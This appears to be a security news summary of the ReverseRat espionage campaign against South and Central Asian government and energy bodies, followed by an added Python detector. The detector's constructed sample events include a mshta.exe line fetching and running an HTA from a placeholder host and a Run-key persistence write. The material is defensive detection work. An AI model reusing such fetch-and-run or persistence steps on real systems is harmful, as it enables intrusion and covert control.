Black Lotus Labs has discovered a new remote access Trojan, ReverseRat, that targets government and energy organizations in South and Central Asia. The group's operating infrastructure is believed to be located in Pakistan.
In addition to ReverseRat, the attackers deploy an open-source RAT called AllaKore alongside it to infect further systems and maintain persistence.
In the first phase of the campaign, the attackers, presumably via email, sent victims URLs that redirected them to compromised websites. According to Black Lotus Labs, the attackers chose compromised domains located in the same country as the targeted organization in order to avoid detection and blend in with the network's normal web browsing activity.
Clicking the links downloaded a .zip archive containing a Windows shortcut file (.lnk) and a PDF file. When the shortcut was launched, the PDF was displayed to distract the user. At the same time, the .lnk silently retrieved and ran an HTA file (HTML application) from the compromised website.
The decoy PDFs referenced organizations and events in India in spring 2021. Some of the decoy documents had a more general theme, such as COVID-19 vaccination, while others related to the energy sector.
Then preBotHta launched ReverseRat, which used Windows Management Instrumentation (WMI) to collect information about the device's MAC address, physical memory, processor (maximum clock frequency, name, manufacturer), and so on. The malware encrypted the data with an RC4 key and sent it to the C&C server.
The second HTA file contained an encoded command to modify a registry key, a loader, and the AllaKore tool that provided access to the compromised network.
Analyzing the campaign, the experts identified overlaps with the tactics, techniques and procedures used in Operation SideCopy, run last year by the Pakistani APT group Transparent Tribe. The experts did not say whether the two groups are related.
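The two steps above that a defender can most readily detect are the shortcut launching an HTA from a remote site and the second HTA modifying a registry key. The following is an added example, not code from the article or from Black Lotus Labs: a small Python detector run over constructed, Sysmon-style process-creation (EventID 1) and registry-set (EventID 13) events. It assumes that HTA files are executed by mshta.exe (a Windows fact, not stated in the article), that a user-launched .lnk typically yields a process whose parent is explorer.exe, and that the persistence key is under CurrentVersion\Run, which the article does not specify. The sample events, hostnames and paths are all constructed.

```python
import ntpath
import re
from typing import Dict, List, Tuple

# Constructed sample events in a simplified Sysmon-like "Key=Value" form.
# They are illustrative only, not telemetry from the campaign.
SAMPLE_EVENTS = [
    r"EventID=1 Image=C:\Windows\explorer.exe ParentImage=C:\Windows\System32\winlogon.exe CommandLine=explorer.exe",
    r"EventID=1 Image=C:\Windows\System32\mshta.exe ParentImage=C:\Windows\explorer.exe CommandLine=mshta.exe http://compromised-site.invalid/decoy.hta",
    r"EventID=1 Image=C:\Program Files\Reader\AcroRd32.exe ParentImage=C:\Windows\explorer.exe CommandLine=AcroRd32.exe C:\Users\u\Downloads\invite.pdf",
    r"EventID=13 Image=C:\Windows\System32\mshta.exe TargetObject=HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\updater Details=C:\Users\u\AppData\Roaming\svc.exe",
    r"EventID=1 Image=C:\Windows\System32\mshta.exe ParentImage=C:\Windows\System32\cmd.exe CommandLine=mshta.exe C:\temp\local.hta",
]

# Parse "Key=Value Key2=Value2" lines; values may contain spaces (e.g. "Program Files"),
# so each value runs until the next " Key=" token or end of line.
_KV = re.compile(r"(\w+)=(.*?)(?= \w+=|$)")


def parse_event(line: str) -> Dict[str, str]:
    """Turn one key=value event line into a dict."""
    return dict(_KV.findall(line))


# Assumption: HTA content is executed by mshta.exe.
SCRIPT_HOSTS = {"mshta.exe"}
# Assumption: the registry persistence location; the article only says "a registry key".
RUN_KEY_MARKER = "\\currentversion\\run\\"


def detect(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (rule_name, detail) alerts for the HTA chain described above."""
    alerts: List[Tuple[str, str]] = []
    for ev in events:
        image = ntpath.basename(ev.get("Image", "")).lower()
        eid = ev.get("EventID")
        if eid == "1" and image in SCRIPT_HOSTS:
            # Rule 1: a script host fetching its payload from a remote URL.
            cmd = ev.get("CommandLine", "")
            if re.search(r"https?://", cmd, re.I):
                parent = ntpath.basename(ev.get("ParentImage", "")).lower()
                # explorer.exe as parent matches a user double-clicking a shortcut.
                confidence = "high" if parent == "explorer.exe" else "medium"
                alerts.append(("remote_hta_execution",
                               f"{confidence}: {image} fetched {cmd.split()[-1]} (parent {parent})"))
        elif eid == "13" and image in SCRIPT_HOSTS:
            # Rule 2: a script host writing a Run-key value for persistence.
            target = ev.get("TargetObject", "")
            if RUN_KEY_MARKER in target.lower():
                alerts.append(("run_key_persistence",
                               f"{image} set {target} -> {ev.get('Details', '')}"))
    return alerts


def scan(lines: List[str]) -> List[Tuple[str, str]]:
    """Parse raw lines and run the detectors over them."""
    return detect([parse_event(line) for line in lines])


if __name__ == "__main__":
    for rule, detail in scan(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

Against the constructed events the detector raises exactly two alerts: the mshta.exe process launched by explorer.exe with a remote URL, and the Run-key write performed by mshta.exe. The locally sourced HTA in the last event is deliberately not flagged, since the article's chain is specifically a remote fetch from a compromised site; a team that wants to catch local HTA execution as well would widen rule 1 accordingly.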